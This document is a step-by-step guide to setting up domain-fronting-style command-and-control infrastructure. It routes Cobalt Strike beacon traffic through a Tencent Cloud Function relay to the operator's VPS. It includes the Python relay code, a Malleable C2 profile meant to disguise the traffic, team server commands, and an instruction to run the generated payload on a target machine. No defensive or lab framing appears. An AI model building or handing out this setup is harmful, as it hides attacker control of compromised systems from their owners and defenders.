Prerequisites

• Active Tencent Cloud account (API Gateway offers a free tier for the first year)
• A VPS with Cobalt Strike installed (version 4.2 used in this example)

Cloud Function Setup

1. Access the Tencent Cloud console and navigate to the Cloud Functions service. Complete the initial authorization if prompted.
2. Create a new function. Choose "Start from scratch", assign a name, and select Python 3.6 as the runtime environment.
3. Scroll down to the code editor and insert the following script. Replace the c2_url variable with your VPS IP or domain.

import requests
import base64
import json

def main_handler(event, context):
    # Configure your C2 server address here (HTTP or HTTPS)
    c2_url = 'https://<YOUR_VPS_IP>' 
    
    request_path = event.get('path', '/')
    request_headers = event.get('headers', {})
    http_method = event.get('httpMethod')

    if http_method == 'GET':
        backend_resp = requests.get(f"{c2_url}{request_path}", headers=request_headers, verify=False)
    else:
        payload = event.get('body', '')
        backend_resp = requests.post(f"{c2_url}{request_path}", data=payload, headers=request_headers, verify=False)

    # Encode the response body to Base64 for the API Gateway
    encoded_body = base64.b64encode(backend_resp.content).decode('utf-8')

    return {
        "isBase64Encoded": True,
        "statusCode": backend_resp.status_code,
        "headers": dict(backend_resp.headers),
        "body": encoded_body
    }

4. Once saved, go to the Trigger Management tab and create a new trigger.
5. Configure the triggger to use the API Gateway. After creation, click on the API Service name to configure the routing.
6. Edit the API configuration: set the path to / and complete the setup wizard. Ensure the service is published.

Cobalt Strike Profile Configuration

Create a Malleable C2 profile (e.g., tencent_cloud.profile) with the following configuration to blend traffic:

set sample_name "cache";

set sleeptime "5000";
set jitter "10";

http-get {
    set uri "/cloud/auth";

    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        metadata {
            base64;
            prepend "SESSION=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/json";
        header "Server" "Nginx";
        output {
            base64;
            print;
        }
    }
}

http-post {
    set uri "/cloud/data";

    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "ID=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/json";
        output {
            base64;
            print;
        }
    }
}

http-stager {
    set uri_x86 "/libs/loader_x86.dll";
    set uri_x64 "/libs/loader_x64.dll";
}

Launching the Team Server

1. Terminate any running Java instances associated with Cobalt Strike:

   pkill -f java
   

2. Start the team server loading the custom profile:

   ./teamserver <VPS_IP> <PASSWORD> tencent_cloud.profile
   

Listener and Execution

1. In the Cobalt Strike client, create an HTTP Listener.
2. Set the Host feild to the public domain provided by the Tencent Cloud API Gateway trigger.
3. Set the port to 443 if using HTTPS, or 80 for HTTP, matching the configuration in your Python script.
4. Generate a payload (Windows EXE) and execute it on the target machine. The beacon will route traffic through the cloud function to your VPS.